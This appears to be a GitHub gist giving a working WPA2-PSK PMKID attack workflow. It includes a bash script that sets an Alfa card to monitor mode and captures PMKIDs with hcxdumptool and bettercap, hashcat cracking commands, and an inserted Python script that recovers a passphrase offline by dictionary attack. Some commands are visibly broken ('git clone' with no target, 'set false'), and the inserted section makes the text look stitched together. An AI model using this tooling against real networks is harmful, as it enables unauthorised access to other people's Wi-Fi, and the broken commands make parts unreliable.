
Last active Jan 18, 2022
WPA2-PSK PMKID Attack with Kali Live + Alfa AC1200


This short post goes over the workflow I use for the PMKID attack using an Alfa AC1200 (AWUS036ACH) card with a bootable Kali USB and bettercap + hcxdumptool. I have noticed more results using hcxdumptool compared to wifi.assoc all in bettercap, but I still prefer to view and log the output in bettercap, so this workflow helps make the most of both tools.

There's plenty out there about this attack (see resources at bottom), so nothing particularly novel here. As always, you must only execute this workflow on networks where you have permission.


Requirements

  1. Laptop
  2. Kali Live USB
  3. Alfa AC1200 (AWUS036ACH)


Setup

  1. Boot into Kali.
  2. Connect to a network with Internet access to download packages.
  3. Execute script.
  4. Ensure that the card is connected when prompted.
  5. Confirm that card is running in monitor mode with iwconfig.

Capturing Hashes

  1. Execute script.
  2. When you have captured enough, enter wifi.recon off and then q in bettercap; the script then stops hcxdumptool and continues.
  3. When script is finished, it will list all APs where PMKIDs were captured.
  4. Hashes will be found in the *.pmkid.txt files.
  5. Session logs will be found in the *-session_{TOOL}.log files.

Cracking Hashes

  1. Use hashcat with mode 22000, which is the format hcxpcapngtool writes, e.g. hashcat -m 22000 hashes.txt wordlist.txt, and afterwards hashcat -m 22000 hashes.txt --show to list the cracked entries. Mode 16800 is the older PMKID-only format produced by hcxpcaptool -z and will reject 22000 lines; --show by itself does not crack anything, it only prints results already in the potfile, and --force merely suppresses warnings.
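What hashcat actually does with one of those lines, as an added example that is not part of this gist: the script below parses hashcat 22000 entries (the format hcxpcapngtool writes), keeps only the PMKID entries (type 01, skipping the type 02 EAPOL handshake entries), lists the ESSIDs that yielded a PMKID like the gist's one-liner does, and recovers the passphrase by recomputing PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes) and PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_client) for each wordlist candidate. The sample lines, the lab ESSID, the MAC addresses and the passphrase are all constructed for the example; nothing here was captured from a real network.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, List, Optional


@dataclass
class PmkidHash:
    pmkid: bytes
    mac_ap: bytes
    mac_client: bytes
    essid: bytes


def parse_22000(line: str) -> Optional[PmkidHash]:
    """Parse one hashcat 22000 line. Returns None for anything that is not a PMKID
    entry: field 2 is '01' for PMKID entries and '02' for 4-way handshake (EAPOL) entries."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        return None
    return PmkidHash(
        pmkid=bytes.fromhex(fields[2]),
        mac_ap=bytes.fromhex(fields[3]),
        mac_client=bytes.fromhex(fields[4]),
        essid=bytes.fromhex(fields[5]),
    )


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    This is the expensive step, and the one hashcat spends its time on."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_client: bytes) -> bytes:
    """802.11 PMKID derivation: HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_client)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_client, hashlib.sha1).digest()[:16]


def make_22000_line(passphrase: str, essid: bytes, mac_ap: bytes, mac_client: bytes) -> str:
    """Build a PMKID entry in 22000 layout from a known passphrase (used only for the sample)."""
    pmkid = pmkid_from_pmk(pmk_from_passphrase(passphrase, essid), mac_ap, mac_client)
    return "WPA*01*%s*%s*%s*%s***" % (pmkid.hex(), mac_ap.hex(), mac_client.hex(), essid.hex())


def essids_with_pmkid(lines: Iterable[str]) -> List[str]:
    """The AP names that yielded a PMKID, i.e. what the gist's one-liner prints."""
    found = {h.essid.decode("utf-8", "replace") for h in map(parse_22000, lines) if h}
    return sorted(found)


def crack_pmkid(h: PmkidHash, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: return the first candidate whose derived PMKID matches, else None."""
    for candidate in candidates:
        if len(candidate) < 8 or len(candidate) > 63:  # outside the WPA2 passphrase length range
            continue
        pmk = pmk_from_passphrase(candidate, h.essid)
        if hmac.compare_digest(pmkid_from_pmk(pmk, h.mac_ap, h.mac_client), h.pmkid):
            return candidate
    return None


# Constructed sample input: one PMKID entry for a lab AP with a known passphrase, plus an
# EAPOL (type 02) entry with dummy nonce/EAPOL fields that the PMKID filter must skip.
LAB_AP = bytes.fromhex("02a1b2c3d4e5")
LAB_CLIENT = bytes.fromhex("02f6e7d8c9ba")
SAMPLE_LINES = [
    make_22000_line("correct horse battery", b"lab-ap", LAB_AP, LAB_CLIENT),
    "WPA*02*" + "00" * 16 + "*" + LAB_AP.hex() + "*" + LAB_CLIENT.hex() + "*"
    + b"other-ap".hex() + "*" + "00" * 32 + "*" + "00" * 99 + "*02",
]

if __name__ == "__main__":
    print("APs with a PMKID:", essids_with_pmkid(SAMPLE_LINES))
    target = parse_22000(SAMPLE_LINES[0])
    print("recovered:", crack_pmkid(target, ["password", "letmein!", "correct horse battery"]))
```

The point of the attack is visible in crack_pmkid: no client traffic or handshake is needed, only the AP's MAC, the client MAC, the ESSID and the 16-byte PMKID from the first EAPOL frame, and every candidate costs one PBKDF2 run of 4096 SHA-1 HMAC rounds, which is exactly the work hashcat -m 22000 parallelises on the GPU.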


# Install AWUS036ACH drivers.
apt update
apt --yes install realtek-rtl88xxau-dkms
# Install Bettercap.
apt --yes install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
mkdir -p /opt/bettercap
cd /opt/bettercap
# Install hcxtools.
apt update
# Kill whatever is still holding the dpkg lock (e.g. an unattended apt run started at boot). Crude, but fine on a live USB.
kill `lsof /var/lib/dpkg/lock-frontend | tail -1 | awk '{print $2}'`
apt --yes install git libcurl4-openssl-dev libssl-dev zlib1g-dev
cd /opt
git clone
git clone
cd /opt/hcxdumptool
make install
cd /opt/hcxtools
make install
# Plug in the AWUS036ACH, stop the processes that would fight over it, and put it into monitor mode.
read -p "Connect the AWUS036ACH, then press [ENTER]..."
service network-manager stop
killall wpa_supplicant
sleep 2
ip link set wlan1 down
sleep 2
iwconfig wlan1 mode monitor
sleep 2
ip link set wlan1 up
mkdir -p ~/captures/
cd ~/captures/
# Start hcxdumptool in the background. Note that it expects exclusive control of the interface while bettercap
# (started below) hops channels on the same card, so the two tools interfere with each other's channel selection.
# --enable_status exists in the hcxdumptool versions this gist was written for; newer releases changed the option set, so check hcxdumptool --help.
hcxdumptool -i wlan1 -o "$(date +%Y%m%d_%H%M%S)-handshakes_hcxdumptool.pcapng" --enable_status=1 | tee "$(date +%Y%m%d_%H%M%S)-session_hcxdumptool.log" &
sleep 1
/opt/bettercap/bettercap -iface wlan1 -eval "events.ignore wifi.ap.lost; events.ignore wifi.client.probe; events.ignore; set wifi.handshakes.file $(date +%Y%m%d_%H%M%S)-handshakes_bettercap.pcap; set false; wifi.recon on" | tee "$(date +%Y%m%d_%H%M%S)-session_bettercap.log"
sleep 1
killall hcxdumptool
sleep 2
echo "Extracting PMKID hashes from PCAP files..."
for pcap_file in *.pcap*; do
  # hcxpcapngtool writes hashcat 22000 lines: WPA*01*... for PMKIDs, WPA*02*... for EAPOL handshakes.
  hcxpcapngtool -o "$pcap_file.pmkid.txt" "$pcap_file"
done
echo "PMKIDs captured for the following APs:"
# Field 6 of the 9 '*'-separated fields (index -4) is the ESSID in hex; only PMKID (type 01) lines are listed.
python3 -c "import glob, binascii, pprint; pprint.pprint(set([binascii.unhexlify(line.split('*')[-4]) for line in sum([open(hcf).read().splitlines() for hcf in glob.glob('*.pmkid.txt')], []) if line.startswith('WPA*01*')]))"